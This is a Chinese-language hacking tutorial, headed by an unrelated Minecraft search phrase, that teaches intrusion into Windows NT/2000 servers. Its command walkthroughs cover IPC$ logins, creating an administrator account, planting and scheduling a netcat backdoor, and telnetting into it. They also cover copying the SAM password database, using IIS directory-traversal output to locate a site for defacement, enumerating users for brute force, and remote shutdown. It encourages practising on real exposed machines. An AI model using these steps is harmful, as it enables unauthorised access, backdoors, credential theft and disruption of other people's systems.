入侵命令，如果寫得不好別笑啊。我覺得寫這些更有用

我的世界入侵指令怎麼打

入侵命令

如果寫得不好別笑啊。我覺得寫這些更有用，不會像其他人一樣寫一些很無聊不現實的文章。當然這只是我的想法，我也有缺點的。

1：NET

只要你擁有某IP的使用者名稱和密碼，那就用IPC$做連線吧！

這裡我們假如你得到的使用者是hbx，密碼是123456。假設對方IP為127。0。0。1

net use \\127。0。0。1\ipc$ 123456 /user：hbx

退出的命令是

net use \\127。0。0。1\ipc$ /delte

下面的操作你必須登陸後才可以用。登陸的方法就在上面。

————————————

下面我們講怎麼建立一個使用者，由於SA的許可權相當於系統的超級使用者。

我們加一個heibai的使用者密碼為lovechina

net user heibai lovechina /add

只要顯示命令成功，那麼我們可以把他加入Administrator組了。

net localgroup Administrators heibai /add

————————————

這裡是講對映對方的C盤，當然其他盤也可以，只要存在就行了。我們這裡把對方的C盤對映到本地的Z盤。

net use z：\\127。0。0。1\c$

————————————

net start telnet

這樣可以開啟對方的TELNET服務。

————————————

這裡是將Guest使用者啟用，guest是NT的預設使用者，而且無法刪除呢？不知道是否這樣，我的2000就是刪除不了它。

net user guest /active：yes

————————————

這裡是把一個使用者的密碼改掉，我們把guest的密碼改為lovechina，其他使用者也可以的。只要有許可權就行了呀！

net user guest lovechina

net命令果然強大啊！

2：at

一般一個入侵者入侵後都會留下後門，也就是種木馬了，你把木馬傳了上去，怎麼啟動他呢？

那麼需要用AT命令，這裡假設你已經登陸了那個伺服器。

你首先要得到對方的時間，

net time \\127。0。0。1

將會返回一個時間，這裡假設時間為12：1，現在需要新建一個作業，其ID=1

at \\127。0。0。1 12：3 nc。exe

這裡假設了一個木馬，名為NC。EXE，這個東西要在對方伺服器上。

這裡介紹一下NC，NC是NETCAT的簡稱，為了方便輸入，一般會被改名。它是一個TELNET服務，埠為99。

等到了12：3就可以連線到對方的99埠。這樣就給對方種下了木馬。

3：telnet

這個命令非常實用，它可以與遠方做連線，不過正常下需要密碼、使用者，不過你給對方種了木馬，直接連到這個木馬開啟的埠。

telnet 127。0。0。1 99

這樣就可以連到對方的99埠。那你就可以在對方執行命令了，這個也就是肉雞。

4：FTP

它可以將你的東西傳到對方機子上，你可以去申請個支援FTP上傳的空間，國內多的是，如果真的找不到，我WWW。51。NET，不錯的。當我們申請完後，它會給使用者名稱，密碼，以及FTP伺服器。

在上傳前需要登陸先，這裡我們假設FTP服務WWW。51。NET，使用者名稱是HUCJS，密碼是654321

ftpwww。51。net

他會要求輸入使用者，成功後會要求輸入密碼。

————————————

下面先說上傳，假設你需上傳的檔案是INDEX。HTM，它位於C：\下，傳到對方D：\

get c：\index。htm d：\

假設你要把對方C盤下的INDEX。HTM，下到你的機子的D盤下

put c：\index。htm d：\

5：copy

下面我說說怎樣把本地的檔案複製到對方硬碟上去，需要建立好IPC$連線才有效。

這裡我們把本地C盤下的index。htm複製到127。0。0。1的C盤下

copy index。htm \\127。0。0。1\c$\index。htm

————————————

如果你要複製到D盤下把C改為D，就行了！

copy index。htm \\127。0。0。1\d$\index。htm

————————————

如果你要把他複製到WINNT目錄裡

就要把輸入

copy index。htm \\127。0。0。1\admin$\index。htm

admin$是winnt

————————————

要把對方的檔案複製過來，順便告訴大家NT的備份的資料庫放在x：\winnt\repair\sam。_ sam。_是資料庫的檔名

下面就把127。0。0。1的資料庫複製到本地C盤下

copy \\127。0。0。1\admin$\repair\sam。_ c：\

————————————

6：set

如果你跑進了一部機子，而且想黑他（這思想只能在特別時候才準有），當然他的80埠要開，不然你黑給誰看。這時需要用SET命令！

下面是我得到的結果！我來分析它，只是找主頁在那而已。

COMPUTERNAME=PENTIUMII

ComSpec=D：\WINNT\system32\cmd。exe

CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1。1

HTTP_ACCEPT=*/*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=當前登陸者的IP，這裡本來是顯示我的IP，被我刪除了

HTTP_ACCEPT_ENCODING=gzip， deflate

HTTP_USER_AGENT=Mozilla/4。0 （compatible； MSIE 5。0； Windows 98； DigExt）

NUMBER_OF_PROCESSORS=1

Os2LibPath=D：\WINNT\system32\os2\dll；

OS=Windows_NT

Path=D：\WINNT\system32；D：\WINNT

PATHEXT=。COM；。EXE；。BAT；。CMD

PATH_TRANSLATED=E：\vlroot主頁放在的地址，只要你看到PATH_TRANSLATED=的後面就是主頁的存放地址。這裡是E：\vlroot

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， GenuineIntel

PROCESSOR_LEVEL=6

PROCESSOR_REVISION=0303

PROMPT=$P$G

QUERY_STRING=/c+set

REMOTE_ADDR=XX。XX。XX。XX

REMOTE_HOST=XX。XX。XX。XX

REQUEST_METHOD=GET

SCRIPT_NAME=/scripts/。。%2f。。/winnt/system32/cmd。exe

SERVER_NAME=XX。XX。XX。XX

SERVER_PORT=80

SERVER_PORT_SECURE=0

SERVER_PROTOCOL=HTTP/1。1

SERVER_SOFTWARE=Microsoft-IIS/3。0對方使用IIS/3。0

SystemDrive=D：

SystemRoot=D：\WINNT

TZ=GMT-9

USERPROFILE=D：\WINNT\Profiles\Default User

windir=D：\WINNT

粉紅色的那行就是對方主頁存放地址，這裡告訴大家一個技巧，很笨的技巧啊，不過只能用這個方法才能100%的找到主頁的名稱，當你DIR這個目錄時，一定會看到很多檔案，你可以把所有檔案在瀏覽器這樣輸入XX。XX。XX。XX/檔名，這樣只要看到和XX。XX。XX。XX看到的也面一模一樣，那麼這就是主頁的名稱了。

7：nbtstat

如果你掃到一部NT的機子，他的136到139其中一個埠開了的話，就要用這個命令得到使用者了。順便告訴大家這是netbios，得到使用者名稱後就可以猜猜密碼了。例如比較簡單的密碼，密碼和使用者名稱一樣的，都試下，不行就暴力破解吧！

現在網上很多NT的機子都開了這些埠的，你可以練習下，我們來分析得到的結果。

命令是

nbtstat -A XX。XX。XX。XX

-A一定要大寫哦。

下面是得到的結果。

NetBIOS Remote Machine Name Table

Name Type Status

——————————————————————-

Registered Registered Registered Registered Registered Registered Registered Reg

istered Registered Registered Registered

MAC Address = 00-E0-29-14-35-BA

PENTIUMII <00> UNIQUE

PENTIUMII <20> UNIQUE

ORAHOTOWN <00> GROUP

ORAHOTOWN <1C> GROUP

ORAHOTOWN <1B> UNIQUE

PENTIUMII <03> UNIQUE

INet~Services <1C> GROUP

IS~PENTIUMII。。。<00> UNIQUE

ORAHOTOWN <1E> GROUP

ORAHOTOWN <1D> UNIQUE

。。__MSBROWSE__。<01> GROUP

粉紅色的就是登陸過這部系統的使用者，可能你不知道怎麼看，大家是不是看到了一竄數字，只要這竄數字是<03>的話，那他前面的就是使用者。

這裡的使用者是PENTIUMII。

8：Shutdown

關了對方的NT伺服器的命令

Shutdown \\IP地址 t：20

20秒後將NT自動關閉，三思後才能執行這個命令，這樣對對方造很大的損失，要做個有良心的入侵者呀。

9：DIR

這個命令沒什麼好講，但是卻非常重要，他是檢視一目錄裡的所有檔案、資料夾。

你可以本地試下。